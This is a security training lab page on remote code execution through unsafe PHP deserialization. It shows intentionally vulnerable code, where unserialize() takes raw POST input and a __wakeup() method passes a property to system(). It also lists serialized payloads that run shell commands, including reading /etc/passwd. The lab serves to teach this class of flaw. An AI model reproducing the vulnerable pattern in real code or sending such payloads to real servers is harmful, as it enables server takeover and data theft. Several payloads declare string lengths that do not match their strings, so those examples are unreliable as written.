RCE through unsafe deserialization
This lab demonstrates a Remote Code Execution vulnerability through unsafe deserialization. The application deserializes user-supplied data without proper validation, allowing attackers to execute arbitrary code.
Objective: Craft malicious serialized data to execute arbitrary commands on the server.
// Handle deserialization request
if (isset($_POST['data']) && !empty($_POST['data'])) {
$serialized_data = $_POST['data'];
// Vulnerable: Direct deserialization without validation
try {
$deserialized = unserialize($serialized_data);
if ($deserialized !== false) {
// Process deserialized data
}
} catch (Exception $e) {
// Error handling
}
}
// Vulnerable class
class VulnerableClass {
public $command;
public function __wakeup() {
// Vulnerable: Direct command execution
if (isset($this->command)) {
system($this->command);
}
}
}
// Example malicious payload:
// O:15:"VulnerableClass":1:{s:7:"command";s:6:"whoami";}
dataTry these serialized payloads:
O:15:"VulnerableClass":1:{s:7:"command";s:6:"whoami";}O:15:"VulnerableClass":1:{s:7:"command";s:8:"ls -la";}O:15:"VulnerableClass":1:{s:7:"command";s:13:"cat /etc/passwd";}O:15:"VulnerableClass":1:{s:7:"command";s:8:"id && uname -a";}Payload Structure:
O:15:"VulnerableClass" - Object with class name1:{s:7:"command";s:6:"whoami";} - Properties and valuesFollow these steps to test the vulnerability: